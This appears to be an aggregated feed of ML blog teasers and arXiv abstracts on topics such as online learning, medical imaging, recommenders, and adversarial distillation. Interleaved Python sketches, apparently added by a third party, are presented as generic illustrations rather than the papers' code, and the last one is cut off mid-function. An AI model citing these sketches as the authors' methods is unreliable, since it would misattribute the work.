    In HTML you can mark the language of a piece of text by putting it inside span tags and setting the lang attribute to a two-letter abbreviation. For example, <span lang="fr">Allons enfants de la Patrie, Le jour de gloire est arrivé !</span> indicates that the first two lines of the French national anthem are in […] How to mark a language in HTML first appeared on John D. Cook.  ( 5 min )
  • Open

    Thinking beyond audio: Augmenting headphones for everyday digital interactions
    Because headphones rank among the most popular wearables in the market, we have an exciting opportunity to expand their capabilities through integrating existing sensors with supplementary ones to enable a wide variety of experiences that go beyond traditional audio control. The post Thinking beyond audio: Augmenting headphones for everyday digital interactions appeared first on Microsoft Research.  ( 12 min )
  • Open

    Score! Team NVIDIA Takes Trophy in Recommendation Systems
    A crack NVIDIA team of five machine learning experts spread across four continents won all three tasks in a hotly contested, prestigious competition to build state-of-the-art recommendation systems. The results reflect the group’s savvy applying the NVIDIA AI platform to real-world challenges for these engines of the digital economy. Recommenders serve up trillions of search Read article >  ( 6 min )
    MosaicML Helps AI Users Boost Accuracy, Cut Costs and Save Time
    Startup MosaicML is on a mission to help the AI community improve prediction accuracy, decrease costs and save time by providing tools for easy training and deployment of large AI models. In this episode of NVIDIA’s AI Podcast, host Noah Kravitz speaks with MosaicML CEO and co-founder Naveen Rao about how the company aims to Read article >  ( 5 min )
  • Open

    Isotuning With Applications To Scale-Free Online Learning. (arXiv:2112.14586v2 [cs.LG] UPDATED)
    We extend and combine several tools of the literature to design fast, adaptive, anytime and scale-free online learning algorithms. Scale-free regret bounds must scale linearly with the maximum loss, both toward large losses and toward very small losses. Adaptive regret bounds demonstrate that an algorithm can take advantage of easy data and potentially have constant regret. We seek to develop fast algorithms that depend on as few parameters as possible, in particular they should be anytime and thus not depend on the time horizon. Our first and main tool, isotuning, is a generalization of the idea of balancing the trade-off of the regret. We develop a set of tools to design and analyze such learning rates easily and show that they adapt automatically to the rate of the regret (whether constant, $O(\log T)$, $O(\sqrt{T})$, etc.) within a factor 2 of the optimal learning rate in hindsight for the same observed quantities. The second tool is an online correction, which allows us to obtain centered bounds for many algorithms, to prevent the regret bounds from being vacuous when the domain is overly large or only partially constrained. The last tool, null updates, prevents the algorithm from performing overly large updates, which could result in unbounded regret, or even invalid updates. We develop a general theory using these tools and apply it to several standard algorithms. In particular, we (almost entirely) restore the adaptivity to small losses of FTRL for unbounded domains, design and prove scale-free adaptive guarantees for a variant of Mirror Descent (at least when the Bregman divergence is convex in its second argument), extend Adapt-ML-Prod to scale-free guarantees, and provide several other minor contributions about Prod, AdaHedge, BOA and Soft-Bayes.  ( 3 min )
    RELDEC: Reinforcement Learning-Based Decoding of Moderate Length LDPC Codes. (arXiv:2112.13934v2 [cs.IT] UPDATED)
    In this work we propose RELDEC, a novel approach for sequential decoding of moderate length low-density parity-check (LDPC) codes. The main idea behind RELDEC is that an optimized decoding policy is subsequently obtained via reinforcement learning based on a Markov decision process (MDP). In contrast to our previous work, where an agent learns to schedule only a single check node (CN) within a group (cluster) of CNs per iteration, in this work we train the agent to schedule all CNs in a cluster, and all clusters in every iteration. That is, in each learning step of RELDEC an agent learns to schedule CN clusters sequentially depending on a reward associated with the outcome of scheduling a particular cluster. We also modify the state space representation of the MDP, enabling RELDEC to be suitable for larger block length LDPC codes than those studied in our previous work. Furthermore, to address decoding under varying channel conditions, we propose agile meta-RELDEC (AM-RELDEC) that employs meta-reinforcement learning. The proposed RELDEC scheme significantly outperforms standard flooding and random sequential decoding for a variety of LDPC codes, including codes designed for 5G new radio.  ( 2 min )
    CT-based Subchondral Bone Microstructural Analysis in Knee Osteoarthritis via MR-Guided Distillation Learning. (arXiv:2307.04390v2 [eess.IV] UPDATED)
    Background: MR-based subchondral bone effectively predicts knee osteoarthritis. However, its clinical application is limited by the cost and time of MR. Purpose: We aim to develop a novel distillation-learning-based method named SRRD for subchondral bone microstructural analysis using easily-acquired CT images, which leverages paired MR images to enhance the CT-based analysis model during training. Materials and Methods: Knee joint images of both CT and MR modalities were collected from October 2020 to May 2021. Firstly, we developed a GAN-based generative model to transform MR images into CT images, which was used to establish the anatomical correspondence between the two modalities. Next, we obtained numerous patches of subchondral bone regions of MR images, together with their trabecular parameters (BV / TV, Tb. Th, Tb. Sp, Tb. N) from the corresponding CT image patches via regression. The distillation-learning technique was used to train the regression model and transfer MR structural information to the CT-based model. The regressed trabecular parameters were further used for knee osteoarthritis classification. Results: A total of 80 participants were evaluated. CT-based regression results of trabecular parameters achieved intra-class correlation coefficients (ICCs) of 0.804, 0.773, 0.711, and 0.622 for BV / TV, Tb. Th, Tb. Sp, and Tb. N, respectively. The use of distillation learning significantly improved the performance of the CT-based knee osteoarthritis classification method using the CNN approach, yielding an AUC score of 0.767 (95% CI, 0.681-0.853) instead of 0.658 (95% CI, 0.574-0.742) (p<.001). Conclusions: The proposed SRRD method showed high reliability and validity in MR-CT registration, regression, and knee osteoarthritis classification, indicating the feasibility of subchondral bone microstructural analysis based on CT images.  ( 3 min )
    Hyper-parameter Tuning for Adversarially Robust Models. (arXiv:2304.02497v2 [cs.LG] UPDATED)
    This work focuses on the problem of hyper-parameter tuning (HPT) for robust (i.e., adversarially trained) models, shedding light on the new challenges and opportunities arising during the HPT process for robust models. To this end, we conduct an extensive experimental study based on 3 popular deep models, in which we explore exhaustively 9 (discretized) HPs, 2 fidelity dimensions, and 2 attack bounds, for a total of 19208 configurations (corresponding to 50 thousand GPU hours). Through this study, we show that the complexity of the HPT problem is further exacerbated in adversarial settings due to the need to independently tune the HPs used during standard and adversarial training: succeeding in doing so (i.e., adopting different HP settings in both phases) can lead to a reduction of up to 80% and 43% of the error for clean and adversarial inputs, respectively. On the other hand, we also identify new opportunities to reduce the cost of HPT for robust models. Specifically, we propose to leverage cheap adversarial training methods to obtain inexpensive, yet highly correlated, estimations of the quality achievable using state-of-the-art methods. We show that, by exploiting this novel idea in conjunction with a recent multi-fidelity optimizer (taKG), the efficiency of the HPT process can be enhanced by up to 2.1x.  ( 2 min )
    Gait Characterization in Duchenne Muscular Dystrophy (DMD) Using a Single-Sensor Accelerometer: Classical Machine Learning and Deep Learning Approaches. (arXiv:2105.06295v3 [eess.SP] UPDATED)
    Differences in gait patterns of children with Duchenne muscular dystrophy (DMD) and typically-developing (TD) peers are visible to the eye, but quantifications of those differences outside of the gait laboratory have been elusive. In this work, we measured vertical, mediolateral, and anteroposterior acceleration using a waist-worn iPhone accelerometer during ambulation across a typical range of velocities. Fifteen TD and fifteen DMD children from 3-16 years of age underwent eight walking/running activities, including five 25-meter walk/run speed-calibration tests at speeds ranging from a slow walk to a run (SC-L1 to SC-L5), a 6-minute walk test (6MWT), a 100-meter fast-walk/jog/run (100MRW), and a free walk (FW). For clinical anchoring purposes, participants completed a Northstar Ambulatory Assessment (NSAA). We extracted temporospatial gait clinical features (CFs) and applied multiple machine learning (ML) approaches to differentiate between DMD and TD children using extracted temporospatial gait CFs and raw data. Extracted temporospatial gait CFs showed reduced step length and a greater mediolateral component of total power (TP), consistent with shorter strides and the Trendelenburg-like gait commonly observed in DMD. ML approaches using temporospatial gait CFs and raw data varied in effectiveness at differentiating between DMD and TD controls at different speeds, with an accuracy of up to 100%. We demonstrate that by using ML with accelerometer data from a consumer-grade smartphone, we can capture DMD-associated gait characteristics in toddlers to teens.  ( 3 min )
    Directed Diffusion: Direct Control of Object Placement through Attention Guidance. (arXiv:2302.13153v2 [cs.CV] UPDATED)
    Text-guided diffusion models such as DALLE-2, Imagen, and Stable Diffusion are able to generate an effectively endless variety of images given only a short text prompt describing the desired image content. In many cases the images are of very high quality. However, these models often struggle to compose scenes containing several key objects such as characters in specified positional relationships. The missing capability to "direct" the placement of characters and objects both within and across images is crucial in storytelling, as recognized in the literature on film and animation theory. In this work, we take a particularly straightforward approach to providing the needed direction. Drawing on the observation that the cross-attention maps for prompt words reflect the spatial layout of objects denoted by those words, we introduce an optimization objective that produces ``activation'' at desired positions in these cross-attention maps. The resulting approach is a step toward generalizing the applicability of text-guided diffusion models beyond single images to collections of related images, as in storybooks. To the best of our knowledge, our Directed Diffusion method is the first diffusion technique that provides positional control over multiple objects, while making use of an existing pre-trained model and maintaining a coherent blend between the positioned objects and the background. Moreover, it requires only a few lines to implement.  ( 3 min )
    Single-Model Attribution of Generative Models Through Final-Layer Inversion. (arXiv:2306.06210v2 [cs.CV] UPDATED)
    Recent groundbreaking developments on generative modeling have sparked interest in practical single-model attribution. Such methods predict whether a sample was generated by a specific generator or not, for instance, to prove intellectual property theft. However, previous works are either limited to the closed-world setting or require undesirable changes of the generative model. We address these shortcomings by proposing FLIPAD, a new approach for single-model attribution in the open-world setting based on final-layer inversion and anomaly detection. We show that the utilized final-layer inversion can be reduced to a convex lasso optimization problem, making our approach theoretically sound and computationally efficient. The theoretical findings are accompanied by an experimental study demonstrating the effectiveness of our approach, outperforming the existing methods.  ( 2 min )
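    The abstract's claim that final-layer inversion reduces to a convex lasso problem can be illustrated with a small, hedged sketch. The snippet below is not the paper's FLIPAD pipeline; it merely solves a lasso instance for a hypothetical final linear layer `W` using ISTA, a standard proximal-gradient method, and recovers a sparse pre-activation from the layer's output:

```python
import numpy as np

def ista_lasso(W, y, lam=0.05, n_iters=3000):
    """Solve min_x 0.5 * ||W x - y||^2 + lam * ||x||_1 via ISTA:
    a gradient step on the smooth term followed by soft-thresholding."""
    step = 1.0 / np.linalg.norm(W, 2) ** 2      # 1 / Lipschitz constant of the gradient
    x = np.zeros(W.shape[1])
    for _ in range(n_iters):
        z = x - step * (W.T @ (W @ x - y))      # gradient step
        x = np.sign(z) * np.maximum(np.abs(z) - step * lam, 0.0)  # prox of lam*||.||_1
    return x

rng = np.random.default_rng(0)
W = rng.standard_normal((40, 100))              # stand-in for a final linear layer
x_true = np.zeros(100)
x_true[[3, 7, 11]] = [1.5, -2.0, 1.0]           # sparse hypothetical pre-activation
y = W @ x_true                                  # observed final-layer output
x_hat = ista_lasso(W, y)
```

Here `W`, `x_true`, and the lasso weight `lam` are illustrative assumptions; the point is only that the inversion step is a convex problem solvable with off-the-shelf machinery.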
    Distilling BlackBox to Interpretable models for Efficient Transfer Learning. (arXiv:2305.17303v7 [cs.CV] UPDATED)
    Building generalizable AI models is one of the primary challenges in the healthcare domain. While radiologists rely on generalizable descriptive rules of abnormality, Neural Network (NN) models suffer even with a slight shift in input distribution (e.g., scanner type). Fine-tuning a model to transfer knowledge from one domain to another requires a significant amount of labeled data in the target domain. In this paper, we develop an interpretable model that can be efficiently fine-tuned to an unseen target domain with minimal computational cost. We assume the interpretable component of NN to be approximately domain-invariant. However, interpretable models typically underperform compared to their Blackbox (BB) variants. We start with a BB in the source domain and distill it into a \emph{mixture} of shallow interpretable models using human-understandable concepts. As each interpretable model covers a subset of data, a mixture of interpretable models achieves comparable performance as BB. Further, we use the pseudo-labeling technique from semi-supervised learning (SSL) to learn the concept classifier in the target domain, followed by fine-tuning the interpretable models in the target domain. We evaluate our model using a real-life large-scale chest-X-ray (CXR) classification dataset. The code is available at: \url{https://github.com/batmanlab/MICCAI-2023-Route-interpret-repeat-CXRs}.  ( 3 min )
    Improving Code Example Recommendations on Informal Documentation Using BERT and Query-Aware LSH: A Comparative Study. (arXiv:2305.03017v2 [cs.SE] UPDATED)
    Our research investigates the recommendation of code examples to aid software developers, a practice that saves developers significant time by providing ready-to-use code snippets. The focus of our study is Stack Overflow, a commonly used resource for coding discussions and solutions, particularly in the context of the Java programming language. We applied BERT, a powerful Large Language Model (LLM) that enables us to transform code examples into numerical vectors by extracting their semantic information. Once these numerical representations are prepared, we identify Approximate Nearest Neighbors (ANN) using Locality-Sensitive Hashing (LSH). Our research employed two variants of LSH: Random Hyperplane-based LSH and Query-Aware LSH. We rigorously compared these two approaches across four parameters: HitRate, Mean Reciprocal Rank (MRR), Average Execution Time, and Relevance. Our study revealed that the Query-Aware (QA) approach showed superior performance over the Random Hyperplane-based (RH) method. Specifically, it exhibited a notable improvement of 20% to 35% in HitRate for query pairs compared to the RH approach. Furthermore, the QA approach proved significantly more time-efficient, with its speed in creating hashing tables and assigning data samples to buckets being at least four times faster. It can return code examples within milliseconds, whereas the RH approach typically requires several seconds to recommend code examples. Due to the superior performance of the QA approach, we tested it against PostFinder and FaCoY, the state-of-the-art baselines. Our QA method showed comparable efficiency proving its potential for effective code recommendation.  ( 3 min )
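    As a hedged illustration of Random Hyperplane-based LSH (the embeddings below are random stand-ins, not BERT vectors, and the bucketing is a generic textbook construction rather than the study's implementation):

```python
import numpy as np

rng = np.random.default_rng(0)
dim, n_planes = 32, 16
planes = rng.standard_normal((n_planes, dim))   # shared random hyperplanes

def hyperplane_hash(vectors):
    """Map each row vector to an integer bucket key: one bit per hyperplane,
    set when the vector lies on that hyperplane's positive side."""
    signs = (np.atleast_2d(vectors) @ planes.T) > 0
    return signs.astype(np.int64) @ (1 << np.arange(n_planes))

embeddings = rng.standard_normal((100, dim))    # stand-ins for code-example embeddings
keys = hyperplane_hash(embeddings)

# A near-duplicate of item 42 lands in the same bucket, so its candidate
# set is retrieved by a key lookup instead of a full similarity scan.
query = embeddings[42] + 1e-3 * rng.standard_normal(dim)
candidates = np.where(keys == hyperplane_hash(query)[0])[0]
```

The speed claim in the abstract comes from exactly this shape of lookup: hashing is a single matrix product, and only bucket members are rescored.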
    A Survey on Explainable Anomaly Detection. (arXiv:2210.06959v2 [cs.LG] UPDATED)
    In the past two decades, most research on anomaly detection has focused on improving the accuracy of the detection, while largely ignoring the explainability of the corresponding methods and thus leaving the explanation of outcomes to practitioners. As anomaly detection algorithms are increasingly used in safety-critical domains, providing explanations for the high-stakes decisions made in those domains has become an ethical and regulatory requirement. Therefore, this work provides a comprehensive and structured survey on state-of-the-art explainable anomaly detection techniques. We propose a taxonomy based on the main aspects that characterize each explainable anomaly detection technique, aiming to help practitioners and researchers find the explainable anomaly detection method that best suits their needs.  ( 2 min )
    Successive Affine Learning for Deep Neural Networks. (arXiv:2305.07996v2 [cs.LG] UPDATED)
    This paper introduces a successive affine learning (SAL) model for constructing deep neural networks (DNNs). Traditionally, a DNN is built by solving a non-convex optimization problem. It is often challenging to solve such a problem numerically due to its non-convexity and its large number of layers. To address this challenge, inspired by the human education system, the multi-grade deep learning (MGDL) model was recently initiated by the author of this paper. The MGDL model learns a DNN in several grades, in each of which one constructs a shallow DNN consisting of a relatively small number of layers. The MGDL model still requires solving several non-convex optimization problems. The proposed SAL model mutates from the MGDL model. Noting that each layer of a DNN consists of an affine map followed by an activation function, we propose to learn the affine map by solving a quadratic/convex optimization problem which involves the activation function only {\it after} the weight matrix and the bias vector for the current layer have been trained. In the context of function approximation, for a given function the SAL model generates an expansion of the function with adaptive basis functions in the form of DNNs. We establish the Pythagorean identity and the Parseval identity for the system generated by the SAL model. Moreover, we provide a convergence theorem of the SAL process in the sense that either it terminates after a finite number of grades or the norms of its optimal error functions strictly decrease to a limit as the grade number increases to infinity. Furthermore, we present proof-of-concept numerical examples which demonstrate that the proposed SAL model significantly outperforms the traditional deep learning model.  ( 3 min )
    Exploring Image Augmentations for Siamese Representation Learning with Chest X-Rays. (arXiv:2301.12636v2 [eess.IV] UPDATED)
    Image augmentations are quintessential for effective visual representation learning across self-supervised learning techniques. While augmentation strategies for natural imaging have been studied extensively, medical images are vastly different from their natural counterparts. Thus, it is unknown whether common augmentation strategies employed in Siamese representation learning generalize to medical images and to what extent. To address this challenge, in this study, we systematically assess the effect of various augmentations on the quality and robustness of the learned representations. We train and evaluate Siamese Networks for abnormality detection on chest X-Rays across three large datasets (MIMIC-CXR, CheXpert and VinDR-CXR). We investigate the efficacy of the learned representations through experiments involving linear probing, fine-tuning, zero-shot transfer, and data efficiency. Finally, we identify a set of augmentations that yield robust representations that generalize well to both out-of-distribution data and diseases, while outperforming supervised baselines using just zero-shot transfer and linear probes by up to 20%. Our code is available at https://github.com/StanfordMIMI/siaug.  ( 2 min )
    Generative Pretrained Autoregressive Transformer Graph Neural Network applied to the Analysis and Discovery of Novel Proteins. (arXiv:2305.04934v2 [q-bio.BM] UPDATED)
    We report a flexible language-model based deep learning strategy, applied here to solve complex forward and inverse problems in protein modeling, based on an attention neural network that integrates transformer and graph convolutional architectures in a causal multi-headed graph mechanism, to realize a generative pretrained model. The model is applied to predict secondary structure content (per-residue level and overall content), protein solubility, and sequencing tasks. Further trained on inverse tasks, the model is rendered capable of designing proteins with these properties as target features. The model is formulated as a general framework, completely prompt-based, and can be adapted for a variety of downstream tasks. We find that adding additional tasks yields emergent synergies that the model exploits in improving overall performance, beyond what would be possible by training a model on each dataset alone. Case studies are presented to validate the method, yielding protein designs specifically focused on structural proteins, but also exploring the applicability in the design of soluble, antimicrobial biomaterials. While our model is trained to ultimately perform 8 distinct tasks, with available datasets it can be extended to solve additional problems. In a broader sense, this work illustrates a form of multiscale modeling that relates a set of ultimate building blocks (here, byte-level utf8 characters that define the nature of the physical system at hand) to complex output. This materiomic scheme captures complex emergent relationships between universal building block and resulting properties via a synergizing learning capacity to express a set of potentialities embedded in the knowledge used in training, via the interplay of universality and diversity.  ( 3 min )
    Prediction intervals for neural network models using weighted asymmetric loss functions. (arXiv:2210.04318v4 [stat.ML] UPDATED)
    We propose a simple and efficient approach to generate prediction intervals (PIs) for approximated and forecasted trends. Our method leverages a weighted asymmetric loss function to estimate the lower and upper bounds of the PI, with the weights determined by the target coverage probability. We provide a concise mathematical proof of the method, show how it can be extended to derive PIs for parametrised functions, and argue why the method works for predicting PIs of dependent variables. The presented tests of the method on a real-world forecasting task using a neural network-based model show that it can produce reliable PIs in complex machine learning scenarios.  ( 2 min )
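    A minimal sketch of the core idea, assuming a pinball-style weighted asymmetric loss (the paper's exact loss and training setup are not reproduced here; constant bounds fit by grid search stand in for a neural network):

```python
import numpy as np

def asymmetric_loss(residual, w):
    """Penalize positive residuals with weight w and negative residuals with
    (1 - w). Large w pushes the estimate up (an upper bound); small w pushes
    it down (a lower bound). This is the classic pinball asymmetry."""
    return np.mean(np.where(residual > 0, w * residual, (w - 1.0) * residual))

rng = np.random.default_rng(1)
y = rng.normal(0.0, 1.0, 5000)                  # toy targets
grid = np.linspace(-3, 3, 601)                  # candidate constant bounds

w = 0.95  # ~90% central coverage: weight 0.95 for the upper, 0.05 for the lower
upper = grid[np.argmin([asymmetric_loss(y - g, w) for g in grid])]
lower = grid[np.argmin([asymmetric_loss(y - g, 1.0 - w) for g in grid])]
coverage = np.mean((y >= lower) & (y <= upper))
```

Minimizing this loss at weight w yields the w-quantile of the targets, which is why the chosen weights control the coverage probability of the interval.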
    QI2 -- an Interactive Tool for Data Quality Assurance. (arXiv:2307.03419v2 [cs.CY] CROSS LISTED)
    The importance of high data quality is increasing with the growing impact and distribution of ML systems and big data. Also, the planned AI Act from the European Commission defines challenging legal requirements for data quality, especially for the market introduction of safety-relevant ML systems. In this paper we introduce a novel approach that supports the data quality assurance process across multiple data quality aspects. This approach enables the verification of quantitative data quality requirements. The concept and benefits are introduced and explained on small example data sets. The application of the method is demonstrated on the well-known MNIST data set of handwritten digits.  ( 2 min )
    Hybrid quantum-classical machine learning for generative chemistry and drug design. (arXiv:2108.11644v2 [quant-ph] UPDATED)
    Deep generative chemistry models emerge as powerful tools to expedite drug discovery. However, the immense size and complexity of the structural space of all possible drug-like molecules pose significant obstacles, which could be overcome with hybrid architectures combining quantum computers with deep classical networks. As the first step toward this goal, we built a compact discrete variational autoencoder (DVAE) with a Restricted Boltzmann Machine (RBM) of reduced size in its latent layer. The size of the proposed model was small enough to fit on a state-of-the-art D-Wave quantum annealer and allowed training on a subset of the ChEMBL dataset of biologically active compounds. Finally, we generated 2331 novel chemical structures with medicinal chemistry and synthetic accessibility properties in the ranges typical for molecules from ChEMBL. The presented results demonstrate the feasibility of using already existing or soon-to-be-available quantum computing devices as testbeds for future drug discovery applications.  ( 2 min )
    Solving PDEs with Unmeasurable Source Terms Using Coupled Physics-Informed Neural Network with Recurrent Prediction for Soft Sensors. (arXiv:2301.08618v3 [cs.LG] UPDATED)
    Partial differential equations (PDEs) are a model candidate for soft sensors in industrial processes with spatiotemporal dependence. Although physics-informed neural networks (PINNs) are a promising machine learning method for solving PDEs, they are infeasible for nonhomogeneous PDEs with unmeasurable source terms. To this end, a coupled PINN (CPINN) with a recurrent prediction (RP) learning strategy (CPINN-RP) is proposed. First, a CPINN composed of NetU and NetG is proposed: NetU approximates the PDE solutions and NetG regularizes the training of NetU. The two networks are integrated into a data-physics-hybrid loss function. We then theoretically prove that the proposed CPINN has a satisfying approximation capability for solutions to nonhomogeneous PDEs with unmeasurable source terms, and, beyond the theoretical aspects, propose a hierarchical training strategy to optimize and couple NetU and NetG. Second, NetU-RP is proposed to compensate for information loss in data sampling and improve the prediction performance, where RP consists of the recurrently delayed outputs of the well-trained CPINN and hard sensors. Finally, artificial and practical datasets are used to verify the feasibility and effectiveness of CPINN-RP for soft sensors.  ( 3 min )
    Generalization Error of First-Order Methods for Statistical Learning with Generic Oracles. (arXiv:2307.04679v2 [cs.LG] UPDATED)
    In this paper, we provide a novel framework for the analysis of generalization error of first-order optimization algorithms for statistical learning when the gradient can only be accessed through partial observations given by an oracle. Our analysis relies on the regularity of the gradient w.r.t. the data samples, and allows to derive near matching upper and lower bounds for the generalization error of multiple learning problems, including supervised learning, transfer learning, robust learning, distributed learning and communication efficient learning using gradient quantization. These results hold for smooth and strongly-convex optimization problems, as well as smooth non-convex optimization problems verifying a Polyak-Lojasiewicz assumption. In particular, our upper and lower bounds depend on a novel quantity that extends the notion of conditional standard deviation, and is a measure of the extent to which the gradient can be approximated by having access to the oracle. As a consequence, our analysis provides a precise meaning to the intuition that optimization of the statistical learning objective is as hard as the estimation of its gradient. Finally, we show that, in the case of standard supervised learning, mini-batch gradient descent with increasing batch sizes and a warm start can reach a generalization error that is optimal up to a multiplicative factor, thus motivating the use of this optimization scheme in practical applications.  ( 3 min )
    Temporal Conditioning Spiking Latent Variable Models of the Neural Response to Natural Visual Scenes. (arXiv:2306.12045v2 [q-bio.NC] UPDATED)
    Developing computational models of neural response is crucial for understanding sensory processing and neural computations. Current state-of-the-art neural network methods use temporal filters to handle temporal dependencies, resulting in an unrealistic and inflexible processing flow. Meanwhile, these methods target trial-averaged firing rates and fail to capture important features in spike trains. This work presents the temporal conditioning spiking latent variable models (TeCoS-LVM) to simulate the neural response to natural visual stimuli. We use spiking neurons to produce spike outputs that directly match the recorded trains. This approach helps to avoid losing information embedded in the original spike trains. We exclude the temporal dimension from the model parameter space and introduce a temporal conditioning operation to allow the model to adaptively explore and exploit temporal dependencies in stimuli sequences in a natural paradigm. We show that TeCoS-LVM models can produce more realistic spike activities and fit spike statistics more accurately than powerful alternatives. Additionally, learned TeCoS-LVM models can generalize well to longer time scales. Overall, while remaining computationally tractable, our model effectively captures key features of neural coding systems. It thus provides a useful tool for building accurate predictive computational accounts for various sensory perception circuits.  ( 3 min )
    I2I: Initializing Adapters with Improvised Knowledge. (arXiv:2304.02168v2 [cs.CL] UPDATED)
    Adapters present a promising solution to the catastrophic forgetting problem in continual learning. However, training independent Adapter modules for every new task misses an opportunity for cross-task knowledge transfer. We propose Improvise to Initialize (I2I), a continual learning algorithm that initializes Adapters for incoming tasks by distilling knowledge from previously-learned tasks' Adapters. We evaluate I2I on CLiMB, a multimodal continual learning benchmark, by conducting experiments on sequences of visual question answering tasks. Adapters trained with I2I consistently achieve better task accuracy than independently-trained Adapters, demonstrating that our algorithm facilitates knowledge transfer between task Adapters. I2I also results in better cross-task knowledge transfer than the state-of-the-art AdapterFusion without incurring the associated parametric cost.  ( 2 min )
    High Dimensional Quantum Machine Learning With Small Quantum Computers. (arXiv:2203.13739v3 [quant-ph] UPDATED)
    Quantum computers hold great promise to enhance machine learning, but their current qubit counts restrict the realisation of this promise. To mitigate this limitation, techniques can be applied for evaluating a quantum circuit using a machine with fewer qubits than the circuit naively requires. These techniques work by evaluating many smaller circuits on the smaller machine, which are then combined in a polynomial to replicate the output of the larger machine. This scheme requires more circuit evaluations than are practical for general circuits. However, we investigate the possibility that for certain applications many of these subcircuits are superfluous, and that a much smaller sum is sufficient to estimate the full circuit. We construct a machine learning model that may be capable of approximating the outputs of the larger circuit with much fewer circuit evaluations. We successfully apply our model to the task of digit recognition, using simulated quantum computers much smaller than the data dimension. The model is also applied to the task of approximating a random 10-qubit PQC with simulated access to a 5-qubit computer; even with only a relatively modest number of circuit evaluations, our model provides an accurate approximation of the 10-qubit PQC's output, superior to a neural network attempt. The developed method might be useful for implementing quantum models on larger data throughout the NISQ era.
    Protecting the Future: Neonatal Seizure Detection with Spatial-Temporal Modeling. (arXiv:2307.05382v1 [eess.SP])
    A timely detection of seizures for newborn infants with electroencephalogram (EEG) has been a common yet life-saving practice in the Neonatal Intensive Care Unit (NICU). However, it requires substantial human effort for real-time monitoring, which calls for automated solutions to neonatal seizure detection. Moreover, current automated methods, which focus on adult epilepsy monitoring, often fail due to (i) the dynamic seizure onset location in human brains; (ii) the different montages used on neonates; and (iii) the huge distribution shift among different subjects. In this paper, we propose a deep learning framework, namely STATENet, to address these challenges with exquisite designs at the temporal, spatial and model levels. Experiments on a real-world large-scale neonatal EEG dataset illustrate that our framework achieves significantly better seizure detection performance.
    Responsive parallelized architecture for deploying deep learning models in production environments. (arXiv:2112.08933v2 [cs.LG] UPDATED)
    Recruiters can easily shortlist candidates for jobs by viewing their curriculum vitae (CV) documents. An unstructured CV document holds a candidate's portfolio and named-entity details. The main aim of this study is to design and propose a web-oriented, highly responsive computational pipeline that systematically predicts CV entities using hierarchically-refined label attention networks. Deep learning models specialized for named entity recognition were trained on a large dataset to predict relevant fields. The article suggests an optimal strategy for using a number of deep learning models in parallel and predicting in real time. We demonstrate the selection of a lightweight micro web framework using the Analytical Hierarchy Processing algorithm, and focus on an approach for deploying large deep-learning-model-based pipelines in production-ready environments using microservices. The deployed models and proposed architecture parse a typical CV in less than 700 milliseconds under a sequential flow of requests.
    AdaptiveRec: Adaptively Construct Pairs for Contrastive Learning in Sequential Recommendation. (arXiv:2307.05469v1 [cs.IR])
    This paper presents a solution to the challenges faced by contrastive learning in sequential recommendation systems. In particular, it addresses the issue of false negatives, which limits the effectiveness of recommendation algorithms. By introducing an advanced approach to contrastive learning, the proposed method improves the quality of item embeddings and mitigates the problem of falsely categorizing similar instances as dissimilar. Experimental results demonstrate performance enhancements compared to existing systems. The flexibility and applicability of the proposed approach across various recommendation scenarios further highlight its value in enhancing sequential recommendation systems.
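    One simple, hedged instantiation of the false-negative idea (not the paper's AdaptiveRec pair-construction mechanism): an InfoNCE loss in which in-batch negatives that are suspiciously similar to the anchor are excluded from the softmax denominator instead of being pushed away:

```python
import numpy as np

def info_nce_fn_masked(emb, pos, temperature=0.1, fn_threshold=0.9):
    """InfoNCE loss where in-batch 'negatives' whose cosine similarity to the
    anchor exceeds fn_threshold are dropped from the denominator, treating
    them as likely false negatives rather than true negatives."""
    a = emb / np.linalg.norm(emb, axis=1, keepdims=True)
    p = pos / np.linalg.norm(pos, axis=1, keepdims=True)
    cos = a @ p.T                                   # (B, B) cosine similarities
    sim = cos / temperature
    diag = np.eye(len(a), dtype=bool)               # the positives themselves
    sim = np.where((cos > fn_threshold) & ~diag, -np.inf, sim)  # mask likely FNs
    m = sim.max(axis=1, keepdims=True)              # stable log-sum-exp
    logsumexp = (m + np.log(np.exp(sim - m).sum(axis=1, keepdims=True))).ravel()
    return float(np.mean(logsumexp - np.diag(sim)))

rng = np.random.default_rng(0)
emb = rng.standard_normal((8, 16))
emb[1] = emb[0] + 0.01 * rng.standard_normal(16)    # near-duplicate: a false negative
pos = emb + 0.05 * rng.standard_normal((8, 16))
masked = info_nce_fn_masked(emb, pos, fn_threshold=0.9)
unmasked = info_nce_fn_masked(emb, pos, fn_threshold=2.0)   # cosine <= 1: mask disabled
```

Masking shrinks the denominator for anchors with near-duplicate batch-mates, so the near-duplicate no longer competes with the true positive.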
    Mitigating the Accuracy-Robustness Trade-off via Multi-Teacher Adversarial Distillation. (arXiv:2306.16170v2 [cs.LG] UPDATED)
    Adversarial training is a practical approach for improving the robustness of deep neural networks against adversarial attacks. Although it brings reliable robustness, adversarial training negatively affects performance on clean examples, meaning a trade-off exists between accuracy and robustness. Recently, some studies have tried to use knowledge distillation methods in adversarial training, achieving competitive robustness, but the accuracy on clean samples remains limited. In this paper, to mitigate the accuracy-robustness trade-off, we introduce Multi-Teacher Adversarial Robustness Distillation (MTARD), which guides the model's adversarial training process by applying a strong clean teacher and a strong robust teacher to handle clean examples and adversarial examples, respectively. During the optimization process, to ensure that different teachers show similar knowledge scales, we design the Entropy-Based Balance algorithm to adjust each teacher's temperature and keep the teachers' information entropy consistent. Besides, to ensure that the student learns at a relatively consistent speed from multiple teachers, we propose the Normalization Loss Balance algorithm to adjust the learning weights of the different types of knowledge. A series of experiments conducted on public datasets demonstrate that MTARD outperforms state-of-the-art adversarial training and distillation methods against various adversarial attacks.
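    The entropy-matching step at the heart of such a temperature adjustment can be sketched as follows. This is a hedged illustration with made-up logits, not the paper's Entropy-Based Balance algorithm; it only exploits the fact that softmax entropy increases monotonically with temperature:

```python
import numpy as np

def softmax(z, T):
    """Temperature-scaled softmax (numerically stabilized)."""
    e = np.exp((z - z.max()) / T)
    return e / e.sum()

def entropy(p):
    """Shannon entropy in nats."""
    p = p[p > 0]
    return float(-(p * np.log(p)).sum())

def match_entropy(logits, target_H, lo=0.05, hi=50.0, iters=60):
    """Bisect on temperature until the softened distribution's entropy hits
    target_H; valid because entropy is monotonically increasing in T."""
    for _ in range(iters):
        mid = 0.5 * (lo + hi)
        if entropy(softmax(logits, mid)) < target_H:
            lo = mid
        else:
            hi = mid
    return 0.5 * (lo + hi)

clean_logits = np.array([4.0, 1.0, 0.5, 0.2])    # hypothetical clean-teacher logits
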